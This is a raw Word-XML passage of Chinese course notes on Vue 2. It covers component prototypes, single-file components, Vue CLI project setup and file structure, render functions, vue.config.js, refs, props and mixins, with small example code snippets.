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//这里的this是VueComponent的实例对象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//99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console.log(this.__proto__.__proto__ === Vue.prototype);//true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//创建一个vm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console.log(school.prototype);//Vue实例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console.log(school.prototype.__proto__);//vue的原型对象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const sc = new school();//创建VueComponent的实例对象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console.log(sc.__proto__);//Vue实例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console.log(sc.__proto__.__proto__);//vue的原型对象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console.log(school.prototype.__proto__ === sc.__proto__.__proto__);//true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console.log(Vue.prototype === vm.__proto__);//true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console.log(sc.__proto__.__proto__ === Vue.prototype);//true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console.log(sc.__proto__.__proto__ === vm.__proto__);//true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console.log(school.prototype.__proto__ === Vue.prototype);//true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console.log(school.prototype.__proto__ === vm.__proto__);//true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pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单文件组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一个文件中只包含有1个组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·在vscode中安装Vetur扩展</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·需要脚手架环境运行，先不用管</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·文件结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1493520" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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&lt;!--快速创建快捷键，&lt;v回车--&gt;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&lt;!--定义组件的html结构--&gt;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点我提示学校名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&lt;!--定义组件交互相关的代码--&gt;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默认暴露组件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//设置组件名，最好与文件名保持一致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'北京昌平'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&lt;!--定义组件的css样式--&gt;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学生年龄：{{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&lt;!--汇总所有的组件--&gt;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//引入组件，可以不写后缀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'./School.vue'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'./Student.vue'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//注册组件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'#root'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template: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`&lt;App&gt;&lt;/App&gt;`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jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·index.html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练习一下单文件组件的语法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准备一个容器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&lt;App&gt;&lt;/App&gt;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引入vue.js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&lt;script type="text/javascript" src="../js/vue.js"&gt;&lt;/script&gt;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引入main.js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&lt;script type="text/javascript" src="./main.js"&gt;&lt;/script&gt;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eastAsia="Consolas" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/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Vue脚手架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue 脚手架是Vue 官方提供的标准化开发工具（开发平台）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·文档: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://cli.vuejs.org/zh/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://cli.vuejs.org/zh/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚手架安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·全局安装@vue/cli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm install -g @vue/cli</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·切换到你要创建项目的目录，然后使用以下命令创建项目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue create 项目名</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·打开创建好的项目，并使用以下命令启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm run serve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="5080" b="762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·Vue 脚手架隐藏了所有webpack 相关的配置，若想查看具体的webpakc 配置， 请执行：vue inspect &gt; output.js</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析脚手架文件结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">├── node_modules </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   ├── favicon.ico: 页签图标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   └── index.html: 主页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   ├── assets: 存放静态资源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   │   └── logo.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   │── component: 存放组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   │   └── HelloWorld.vue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   │── App.vue: 汇总所有组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│   │── main.js: 入口文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── .gitignore: git版本管制忽略的配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── babel.config.js: babel的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">├── package.json: 应用包配置文件 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── README.md: 应用描述文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├── package-lock.json：包版本控制文件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·git忽略文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4761865"/>
            <wp:effectExtent l="0" t="0" r="635" b="825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·babel的控制文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- es6转es5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2256155"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1460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·npm配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1821815"/>
            <wp:effectExtent l="0" t="0" r="1905" b="698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·包版本管理文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2212340"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270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·项目说明文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5250180" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="762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·项目入口文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2520950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="889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·放静态资源的文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1973580" cy="2788920"/>
            <wp:effectExtent l="0" t="0" r="762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·除了App组件，其他组件都放到这</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1943100" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="762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·网站的图标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1859280" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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·App（父）组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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·整个应用的界面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2742565"/>
            <wp:effectExtent l="0" t="0" r="4445" b="63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render函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于不同版本的Vue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vue.js与vue.runtime.xxx.js的区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue.js是完整版的Vue，包含：核心功能 + 模板解析器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- vue.runtime.xxx.js是运行版的Vue，只包含：核心功能；没有模板解析器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·因为vue.runtime.xxx.js没有模板解析器，所以不能使用template这个配置项，需要使用render函数接收到的createElement函数去指定具体内容</w:t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该文件是整个项目的入口文件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引入精简版的vue，必须使用render函数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引入完整版的vue，可以不使用render函数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import Vue from 'vue/dist/vue'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//引入App组件，它是所有组件的父组件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创建vue实例对象--vm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//完整版render写法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//传入的参数可创建具体元素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render(createElement){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return createElement('h1','你好啊');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//精简版render写法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render:q =&gt; q('h1','你好啊')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以下代码可以将App组件放入容器中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$mount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eastAsia="Consolas" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改默认配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vue.config.js配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用vue inspect &gt; output.js可以查看到Vue脚手架的默认配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用vue.config.js可以对脚手架进行个性化定制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 详情见：https://cli.vuejs.org/zh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·红框中的文件名不要随意修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1836420" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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·创建配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3791585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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·复制官网代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5715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37560"/>
            <wp:effectExtent l="0" t="0" r="3175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·此处可将main.js改成我们想要的js，但没必要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2903220" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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·关掉语法检查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lintOnSave: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false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//关闭语法检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4010660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270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ref属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·被用来给元素或子组件注册引用信息（id的替代者）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·应用在html标签上获取的是真实DOM元素，应用在组件标签上是组件实例对象（vc）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 打标识：&lt;h1 ref="xxx"&gt;.....&lt;/h1&gt; 或 &lt;School ref="xxx"&gt;&lt;/School&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- this.$refs.xxx</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·此后课程要修改的文件只有src目录下的文件</w:t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"school"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'北京·昌平'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gray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"title"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showDOM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点我输出上方的DOM元素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&lt;School id="sch"/&gt;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//引入School组件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'欢迎学习Vue！'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showDOM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console.log(this.$refs.title) //真实DOM元素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console.log(this.$refs.btn) //真实DOM元素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$refs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//School组件的实例对象（vc）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console.log(document.getElementById("sch"));//School组件的真实Dom元素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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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"title"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showDOM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点我输出上方的DOM元素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&lt;School id="sch"/&gt;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//引入School组件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'欢迎学习Vue！'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showDOM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console.log(this.$refs.title) //真实DOM元素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console.log(this.$refs.btn) //真实DOM元素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$refs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//School组件的实例对象（vc）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console.log(document.getElementById("sch"));//School组件的真实Dom元素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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>props配置项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 让组件接收外部传过来的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·传递数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- &lt;Demo name="xxx"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·接收数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第一种方式（只接收）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- props:['name']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第二种方式（限制类型）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- props:{name:String}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第三种方式（限制类型、限制必要性、指定默认值）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- props:{</w:t>
      </w:r>
    </w:p>
    <w:p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name:{</w:t>
      </w:r>
    </w:p>
    <w:p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type:String, //类型</w:t>
      </w:r>
    </w:p>
    <w:p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required:true, //必要性</w:t>
      </w:r>
    </w:p>
    <w:p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default:'老王' //默认值</w:t>
      </w:r>
    </w:p>
    <w:p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ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·props是只读的，Vue底层会监测你对props的修改，不能修改数据的值，如果是对象，则不能修改对象的地址值，可以修改对象的具体值，但不建议这么改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如果进行了修改，可能会发出警告，若业务需求确实需要修改，那么请复制props的内容到data中一份，然后去修改data中的数据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学生年龄：{{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接收到的值是不允许修改的，需要赋值给data里的属性，然后修改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updateAge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尝试修改收到的年龄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'我是一个尚硅谷的学生'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myAge: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//props的优先级最高，此时已经接受的peops的值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++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//简单声明接收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props:['name','age','sex']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//接收的同时对数据进行类型限制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props:{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name:String,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age:Number,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sex:String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//接收的同时对数据：进行类型限制+默认值的指定+必要性的限制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String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//name的类型是字符串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required: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//name是必要的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default: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//默认值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String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required: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props发送数据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:age加上冒号，发送的就是number的18，因为里面不是字符串而是表达式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不能传key、ref等关键字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"李四"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"女"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t>mixin(混入)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 可以把多个组件共用的配置提取成一个混入对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第一步定义混合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    data(){....},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    methods:{....}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ....</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第二步使用混入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 全局混入：Vue.mixin(xxx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 局部混入：mixins:['xxx']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/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562100" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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//引入一个混入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hunhe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hunhe2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'../mixin'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//使用混入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mixins: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hunhe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hunhe2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hunhe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'../mixin'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mixins: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hunhe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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·mixin.js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//创建需要混入的配置对象并暴露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hunhe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hunhe2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//如果原本就配置有data属性，再混入data属性，就会将属性整合到一起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//如果有相同的属性，则使用原文件的属性值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y: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eastAsia="Consolas" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
